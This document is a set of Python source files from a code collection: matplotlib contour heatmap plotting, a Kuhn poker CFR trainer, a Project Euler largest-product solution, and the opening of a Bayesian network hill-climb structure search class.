xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
if len(list_data) == 4:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
z_4 = np.log10(list_data[3].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
z_4 = list_data[3].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_4 = griddata(
(x, y), z_4, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3), np.min(zi_4))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3), np.max(zi_4))
fig, axs = plt.subplots(2, 2)
fig.suptitle(title)
axs[0, 0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0, 0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0, 0].transAxes,
)
axs[0, 0].xaxis.set_visible(False)
axs[0, 0].set_ylabel(labels[1])
axs[0, 1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[0, 1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0, 1].transAxes,
)
axs[0, 1].xaxis.set_visible(False)
axs[0, 1].yaxis.set_visible(False)
axs[1, 0].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[1, 0].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 0].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1, 0].transAxes,
)
axs[1, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[1, 0].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 1].contour(
xi, yi, zi_4, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax4 = axs[1, 1].contourf(
xi, yi, zi_4, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 1].text(
0.5,
0.8,
list_legend[3],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1, 1].transAxes,
)
axs[1, 1].yaxis.set_visible(False)
axs[1, 1].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if len(list_data) == 6:
dict_parameters = {"fontsize": 14}
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
z_4 = np.log10(list_data[3].flatten())
z_5 = np.log10(list_data[4].flatten())
z_6 = np.log10(list_data[5].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
z_4 = list_data[3].flatten()
z_5 = list_data[4].flatten()
z_6 = list_data[5].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_4 = griddata(
(x, y), z_4, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_5 = griddata(
(x, y), z_5, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_6 = griddata(
(x, y), z_6, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(
np.min(zi_1),
np.min(zi_2),
np.min(zi_3),
np.min(zi_4),
np.min(zi_5),
np.min(zi_6),
)
max_val = max(
np.max(zi_1),
np.max(zi_2),
np.max(zi_3),
np.max(zi_4),
np.max(zi_5),
np.max(zi_6),
)
fig, axs = plt.subplots(2, 3)
fig.suptitle(title)
axs[0, 0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0, 0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 0].set_title(
list_legend[0], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 0].xaxis.set_visible(False)
axs[0, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[0, 1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[0, 1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 1].set_title(
list_legend[1], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 1].xaxis.set_visible(False)
axs[0, 1].yaxis.set_visible(False)
axs[0, 2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[0, 2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0, 2].set_title(
list_legend[2], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[0, 2].xaxis.set_visible(False)
axs[0, 2].yaxis.set_visible(False)
axs[1, 0].contour(
xi, yi, zi_4, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax4 = axs[1, 0].contourf(
xi, yi, zi_4, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 0].set_title(
list_legend[3], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 0].set_ylabel(labels[1], fontsize=fontsize)
axs[1, 0].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 1].contour(
xi, yi, zi_5, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax5 = axs[1, 1].contourf(
xi, yi, zi_5, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 1].set_title(
list_legend[4], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 1].yaxis.set_visible(False)
axs[1, 1].set_xlabel(labels[0], fontsize=fontsize)
axs[1, 2].contour(
xi, yi, zi_6, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax6 = axs[1, 2].contourf(
xi, yi, zi_6, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1, 2].set_title(
list_legend[5], fontdict=dict_parameters, position=(0.5, 0.2)
)
axs[1, 2].yaxis.set_visible(False)
axs[1, 2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="pdf", bbox_inches="tight")
plt.close()
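
# A standalone sketch of the interpolation idiom the heatmap functions above
# rely on: scattered (x, y, z) samples are interpolated onto a regular grid
# with scipy's griddata before contouring. All values here are illustrative.
def _griddata_demo_sketch():
    x = uniform(0.0, 1.0, 50)
    y = uniform(0.0, 1.0, 50)
    z = np.sin(4 * x) * np.cos(4 * y)
    xi = np.linspace(0.0, 1.0, 100)
    yi = np.linspace(0.0, 1.0, 100)
    # (xi[None, :], yi[:, None]) broadcasts to the full 100x100 evaluation grid.
    return griddata((x, y), z, (xi[None, :], yi[:, None]), method="cubic")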
def plot_heatmaps_small(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(3, 1)
# fig, axs = plt.subplots(3, 1,figsize=(5,10))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].xaxis.set_visible(False)
# axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
# axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="pdf", bbox_inches="tight")
plt.close()
def plot_heatmaps_blogpost(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
plt.xkcd()
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(1, 3, figsize=(18, 5))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
# axs[0].xaxis.set_visible(False)
axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[0].set_xticks([-7, -5, -3])
axs[0].set_xlabel(labels[0], fontsize=fontsize)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
# axs[1].xaxis.set_visible(False)
axs[1].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].set_xlabel(labels[0], fontsize=fontsize)
axs[1].set_xticks([-7, -5, -3])
axs[2].contour(
xi, yi, zi_3, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax3 = axs[2].contourf(
xi, yi, zi_3, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[2].text(
0.5,
0.8,
list_legend[2],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[2].transAxes,
)
axs[2].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[2].set_xlabel(labels[0], fontsize=fontsize)
axs[2].set_xticks([-7, -5, -3])
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.get_yaxis().labelpad = 24
cbar.ax.set_ylabel(label_heatmap, rotation=270, fontsize=fontsize)
# Hide x labels and tick labels for top plots and y ticks for right plots.
for ax in axs.flat:
ax.label_outer()
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, format="png", bbox_inches="tight")
plt.close()
93ca6ead3e3c6f8a4854664e81a2a6df24893921 | 6,412 bytes | py | Python | program/KuhnTrainer.py | Artemys24/IAPoker @ 34eee1b2c251ff825f1e36758212b6bb46bb513b | ["MIT"] | 9 stars (2019-12-22 to 2021-07-07)
import random
from typing import *
from KuhnNode import KuhnNode
import pickle, time
from KuhnTest import KuhnTest
NUM_ACTIONS = 2
nodeMap = {}
def continueTrain(file, iterations: int, saveName):
kt = KuhnTest()
kt.read(file)
global nodeMap
nodeMap = kt.nodeMap
train(iterations, saveName)
def continueTrainPrune(file, iterations: int, saveName):
kt = KuhnTest()
kt.read(file)
global nodeMap
nodeMap = kt.nodeMap
trainPrune(iterations, saveName)
def train(iterations: int, saveName):
t1 = time.time()
# We represent cards[0] as player 1 and cards[1] as player 2
cards = [1, 2, 3]
util = 0
for i in range(1, iterations):
# Shuffle Cards. Note that cards are shuffled before call to cfr,
# chance node outcomes are pre-sampled.
# This form of Monte Carlo CFR is called chance-sampling.
random.shuffle(cards)
util += cfr(cards, '', 1, 1)
# Progress
freq_print = 100000
        if i % freq_print == 0:
if time.time() - t1 != 0.:
print(f"Kuhn trained {i} iterations. {str(freq_print / (time.time() - t1))} iterations per second.")
my = KuhnTest()
my.nodeMap = nodeMap
print("Average game value: " + str(my.gameValue()))
print(f"Worst case game value: {my.exploitability()}")
print(f"Total exploitability: {-sum(my.exploitability())}")
t1 = time.time()
my = KuhnTest()
my.nodeMap = nodeMap
print("Strategy: ")
for node in nodeMap.values():
print(node)
print("Average game value: " + str(my.gameValue()))
# print("Total exploitability: "+ str(sum(my.exploitability()[a] for a in range(2))))
# Save the trained algorithm
with open(saveName, 'wb') as f:
pickle.dump(nodeMap, f)
def trainPrune(iterations: int, savePath):
t1 = time.time()
# We represent cards[0] as player 1 and cards[1] as player 2
cards = [1, 2, 3]
util = 0
for i in range(1, iterations):
# Shuffle Cards. Note that cards are shuffled before call to cfr,
# chance node outcomes are pre-sampled.
# This form of Monte Carlo CFR is called chance-sampling.
random.shuffle(cards)
util += cfrPrune(cards, '', 1, 1)
# Progress
if i % (10 ** 5) == 0:
my = KuhnTest()
my.nodeMap = nodeMap
print(f"Kuhn trained {i} iterations. {str(10 ** 5 / (time.time() - t1))} iterations per second.")
print(f"Total exploitability: {sum(my.exploitability())}")
t1 = time.time()
my = KuhnTest()
my.nodeMap = nodeMap
for node in nodeMap.values():
print(node)
print("Average game value: " + my.gameValue())
# Save the trained algorithm
with open(savePath, 'wb') as f:
pickle.dump(nodeMap, f)
def cfr(cards: List[int], history: str, p0: float, p1: float) -> float:
plays = len(history)
curr_player = plays % 2
infoSet = str(cards[curr_player]) + history
curr_node = KuhnNode()
curr_node.infoSet = infoSet
payoff = curr_node.returnPayoff(cards)
terminalNode = payoff is not None
# Return payoff for terminal states
if terminalNode:
return payoff
# Get information set node or create it if nonexistent
curr_node = nodeMap.get(infoSet)
if curr_node is None:
curr_node = KuhnNode()
curr_node.infoSet = infoSet
nodeMap[infoSet] = curr_node
# For each action, recursively call cfr with additional history and probability
realization_weight = p1 if curr_player == 0 else p0
strategy = curr_node.getStrategy(realization_weight)
util = [0] * NUM_ACTIONS
# nodeUtil is the weighted average of the cfr of each branch,
# weighted by the probability of traversing down a branch
nodeUtil = 0
for a in range(NUM_ACTIONS):
nextHistory = history + ('p' if a == 0 else 'b')
# The first probability is player 1's counterfactual probability
if curr_player == 0:
util[a] = -cfr(cards, nextHistory, p0 * strategy[a], p1)
# Current player is 1
else:
util[a] = -cfr(cards, nextHistory, p0, p1 * strategy[a])
nodeUtil += strategy[a] * util[a]
# For each action, compute and accumulate counterfactual regret
for a in range(NUM_ACTIONS):
regret = util[a] - nodeUtil
curr_node.regretSum[a] += (p1 if curr_player == 0 else p0) * regret
return nodeUtil
def cfrPrune(cards: List[int], history: str, p0: float, p1: float) -> float:
plays = len(history)
curr_player = plays % 2
infoSet = str(cards[curr_player]) + history
curr_node = KuhnNode()
curr_node.infoSet = infoSet
payoff = curr_node.returnPayoff(cards)
terminalNode = payoff is not None
# Return payoff for terminal states
if terminalNode:
return payoff
# Get information set node or create it if nonexistent
curr_node = nodeMap.get(infoSet)
if curr_node is None:
curr_node = KuhnNode()
curr_node.infoSet = infoSet
nodeMap[infoSet] = curr_node
# For each action, recursively call cfr with additional history and probability
realization_weight = p1 if curr_player == 0 else p0
strategy = curr_node.getStrategy(realization_weight)
util = [0] * NUM_ACTIONS
# nodeUtil is the weighted average of the cfr of each branch,
# weighted by the probability of traversing down a branch
nodeUtil = 0
for a in curr_node.promising_branches:
nextHistory = history + ('p' if a == 0 else 'b')
# The first probability is player 1's counterfactual probability
if curr_player == 0:
util[a] = -cfrPrune(cards, nextHistory, p0 * strategy[a], p1)  # recurse with the pruned variant
# Current player is 1
else:
util[a] = -cfrPrune(cards, nextHistory, p0, p1 * strategy[a])
nodeUtil += strategy[a] * util[a]
# For each action, compute and accumulate counterfactual regret
for a in curr_node.promising_branches:
regret = util[a] - nodeUtil
curr_node.regretSum[a] += (p1 if curr_player == 0 else p0) * regret
return nodeUtil
if __name__ == '__main__':
import time
start_time = time.time()
train(10 ** 6, "kt-10")
# continueTrain('kt-30Mp', 170*10**6, 'kt-200M')
print("--- %s seconds ---" % (time.time() - start_time))
| 35.038251
| 116
| 0.628041
| 840
| 6,412
| 4.727381
| 0.185714
| 0.044321
| 0.018131
| 0.019642
| 0.846134
| 0.846134
| 0.794007
| 0.765802
| 0.737849
| 0.737849
| 0
| 0.021295
| 0.267623
| 6,412
| 182
| 117
| 35.230769
| 0.824319
| 0.232065
| 0
| 0.728682
| 0
| 0.015504
| 0.087268
| 0.015124
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.046512
| 0
| 0.124031
| 0.108527
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9e07bace25495bff9be042764f0916662e12d60e
| 2,815
|
py
|
Python
|
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
"""
Largest product in a series
Problem 8
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
import numpy as np
given_number = list('7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450')
final_product = 0
for i in range(len(given_number) - 12):  # len - 12 so the final 13-digit window is included
current_digits = given_number[i: i+13]
product = np.prod([int(digit) for digit in current_digits])
if product > final_product:
final_product = product
final_digits = current_digits
print('final_digits: ', final_digits)
print('final_product: ', final_product)
"""
final_digits: ['5', '5', '7', '6', '6', '8', '9', '6', '6', '4', '8', '9', '5']
final_product: 23514624000
"""
| 54.134615
| 1,023
| 0.900888
| 147
| 2,815
| 17.163265
| 0.489796
| 0.028537
| 0.022592
| 0.015061
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0
| 0.775
| 0.062167
| 2,815
| 51
| 1,024
| 55.196078
| 0.179545
| 0.459325
| 0
| 0
| 0
| 0
| 0.736052
| 0.715308
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9e0dd5177df052307f6bf740f7bd6711d62c46a4
| 35,527
|
py
|
Python
|
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | 1
|
2019-10-02T01:03:23.000Z
|
2019-10-02T01:03:23.000Z
|
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | null | null | null |
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | null | null | null |
from itertools import permutations
import networkx as nx
from pgmpy.estimators import StructureEstimator
from autopgm.external.K2Score import K2Score
from pgmpy.models import BayesianModel
import random
from collections import defaultdict
class HillClimbSearch(StructureEstimator):
def __init__(self, data, scoring_method=None, inbound_nodes=[], outbound_nodes=[], known_independencies=[],
n_random_restarts=10, random_restart_length=5, scores=None, index=0, lr_variables=[], **kwargs):
"""
Class for heuristic hill climb searches for BayesianModels, to learn
network structure from data. `estimate` attempts to find a model with optimal score.
Parameters
----------
data: pandas DataFrame object
dataframe object where each column represents one variable.
(If some values in the data are missing the data cells should be set to `numpy.NaN`.
Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.)
scoring_method: Instance of a `StructureScore`-subclass (`K2Score` is used as default)
An instance of `K2Score`, `BdeuScore`, or `BicScore`.
This score is optimized during structure estimation by the `estimate`-method.
state_names: dict (optional)
A dict indicating, for each variable, the discrete set of states (or values)
that the variable can take. If unspecified, the observed values in the data set
are taken to be the only possible states.
complete_samples_only: bool (optional, default `True`)
Specifies how to deal with missing data, if present. If set to `True` all rows
that contain `np.Nan` somewhere are ignored. If `False` then, for each variable,
every row where neither the variable nor its parents are `np.NaN` is used.
This sets the behavior of the `state_count`-method.
"""
if scoring_method is not None:
self.scoring_method = scoring_method
else:
self.scoring_method = K2Score(data, **kwargs)
self.inbound_nodes = inbound_nodes
self.outbound_nodes = outbound_nodes
self.known_independencies = known_independencies
self.n_random_restarts = n_random_restarts
self.random_restart_length = random_restart_length
self.scores = scores
self.index = index
self.lr_variables = lr_variables
self.lr_learnable = []
super(HillClimbSearch, self).__init__(data, **kwargs)
def _legal_operations(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
local_score = self.scoring_method.local_score
nodes = self.state_names.keys()
# inbound nodes: their outbound edges are prohibited
prohibited_outbound_edges = set()
for node in self.inbound_nodes:
prohibited_outbound_edges.update([(node, X) for X in nodes])
# outbound nodes: their inbound edges are prohibited
prohibited_inbound_edges = set()
for node in self.outbound_nodes:
prohibited_inbound_edges.update([(X, node) for X in nodes])
potential_new_edges = (set(permutations(nodes, 2)) -
set(model.edges()) -
set([(Y, X) for (X, Y) in model.edges()]) -
set(self.known_independencies) -
prohibited_outbound_edges -
prohibited_inbound_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
